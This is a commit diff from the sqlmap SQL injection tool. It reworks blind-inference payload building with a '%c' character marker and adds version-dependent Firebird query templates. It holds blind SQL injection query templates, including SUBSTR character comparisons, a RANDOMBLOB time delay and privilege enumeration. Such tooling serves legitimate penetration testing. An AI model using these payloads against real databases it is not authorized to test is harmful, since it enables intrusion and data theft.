coollyy little commits

2025-02-03 05:04:11 +03:00 · 2010-12-10 11:32:46 +00:00 · 2010-12-10 11:32:46 +00:00 · fe2039f5ba
commit fe2039f5ba
parent d71e51e765
4 changed files with 21 additions and 16 deletions
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -12,6 +12,7 @@ import re
 from xml.etree import ElementTree as ET

 from lib.core.common import getCompiledRegex
+from lib.core.common import isDBMSVersionAtLeast
 from lib.core.common import randomInt
 from lib.core.common import randomStr
 from lib.core.convert import urlencode
@ -214,7 +215,14 @@ class Agent:

        if "[INFERENCE]" in payload:
            if kb.dbms is not None:
-                inferenceQuery = queries[kb.dbms].inference.query
+                inference = queries[kb.dbms].inference
+                if "dbms_version" in inference:
+                    if isDBMSVersionAtLeast(inference.dbms_version):
+                        inferenceQuery = inference.query
+                    else:
+                        inferenceQuery = inference.query2
+                else:
+                    inferenceQuery = inference.query
                payload = payload.replace("[INFERENCE]", inferenceQuery)
            elif kb.misc.testedDbms is not None:
                inferenceQuery = queries[kb.misc.testedDbms].inference.query
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -46,9 +46,9 @@ DUMP_TAB_MARKER     = "__TAB__"
 DUMP_START_MARKER   = "__START__"
 DUMP_STOP_MARKER    = "__STOP__"

-PAYLOAD_DELIMITER  = "\x00"
-
-MIN_TIME_RESPONSES = 10
+PAYLOAD_DELIMITER   = "\x00"
+CHAR_INFERENCE_MARK = "%c"
+MIN_TIME_RESPONSES  = 10

 # System variables
 IS_WIN             = subprocess.mswindows
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@ -33,6 +33,7 @@ from lib.core.exception import sqlmapValueException
 from lib.core.exception import sqlmapThreadException
 from lib.core.exception import unhandledException
 from lib.core.progress import ProgressBar
+from lib.core.settings import CHAR_INFERENCE_MARK
 from lib.core.unescaper import unescaper
 from lib.request.connect import Connect as Request

@ -141,7 +142,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
        continuousOrder means that distance between each two neighbour's
        numerical values is exactly 1
        """
-        
+
        result = tryHint(idx)

        if result:
@ -170,18 +171,14 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
            position = (len(charTbl) >> 1)
            posValue = charTbl[position]

-            if dbms in (DBMS.SQLITE, DBMS.MAXDB):
-                pushValue(posValue)
-                posValue = chr(posValue) if posValue < 128 else unichr(posValue)
-
-            forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
+            if CHAR_INFERENCE_MARK not in payload:
+                forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
+            else:
+                forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(CHAR_INFERENCE_MARK, chr(posValue) if posValue < 128 else unichr(posValue))

            queriesCount[0] += 1
            result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)

-            if dbms in (DBMS.SQLITE, DBMS.MAXDB):
-                posValue = popValue()
-
            if result:
                minValue = posValue

--- a/xml/queries.xml
+++ b/xml/queries.xml
@ -303,7 +303,7 @@
        <timedelay query="SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(1000000%d))))" dbms_version="&gt;=3.0"/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
+        <inference query="SUBSTR((%s), %d, 1) > '%c'"/>
        <banner query="SELECT SQLITE_VERSION()"/>
        <current_user/>
        <current_db/>
@ -386,7 +386,7 @@
            <inband query="SELECT DISTINCT RDB$USER FROM RDB$USER_PRIVILEGES"/>
            <blind query="SELECT FIRST 1 SKIP %d DISTINCT(RDB$USER) FROM RDB$USER_PRIVILEGES" count="SELECT COUNT(DISTINCT(RDB$USER)) FROM RDB$USER_PRIVILEGES"/>
        </users>
-        <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version="&gt;=2.1"/>
+        <inference query="ASCII_VAL(SUBSTRING((%s) FROM %d FOR 1)) > %d" dbms_version="&gt;=2.1" query2="SUBSTRING((%s) FROM %d FOR 1) > '%c'"/>
        <is_dba query="CURRENT_USER='SYSDBA'"/>
        <tables>
            <inband query="SELECT RDB$RELATION_NAME FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)"/>
@ -429,7 +429,7 @@
        <current_db query="SELECT DATABASE() FROM DUAL"/>
        <order query="ORDER BY %s ASC"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
-        <inference query="SUBSTR((%s), %d, 1) > '%s'"/>
+        <inference query="SUBSTR((%s), %d, 1) > '%c'"/>
        <delimiter query=","/>
        <substring query="SUBSTR((%s), %d, %d)"/>
        <users>